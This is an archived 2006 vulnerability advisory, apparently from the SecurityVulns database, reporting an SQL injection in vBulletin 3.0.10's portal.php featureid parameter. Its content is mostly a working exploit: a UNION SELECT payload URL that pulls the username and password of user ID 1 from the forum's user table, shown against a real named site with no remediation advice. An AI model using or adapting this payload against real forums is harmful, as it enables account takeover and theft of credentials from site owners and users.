vBulletin 3.0.10 Version SQL Injection

2006-06-01T00:00:00
ID SECURITYVULNS:DOC:12919
Type securityvulns
Reporter Securityvulns
Modified 2006-06-01T00:00:00

Description

################################################

vBulletin 3.0.10 Version SQL Injection #

SpC-x #

################################################

Credit : SpC-X #

Site : http://www.Cyber-security.org #

################################################

Code :

http://www.target.com/path/portal.php?id=54&a=viewfeature&featureid=[SQL]

Example :

http://ckknight.wowinterface.com/portal.php?id=54&a=viewfeature&featureid=99999//UNION//SELECT//0,1,2,3,4,username,6,7,8,9,10,11,12,password//from//user//where/*/userid=1/

/SpC-x

--


Get your free email from http://mymail.bsdmail.com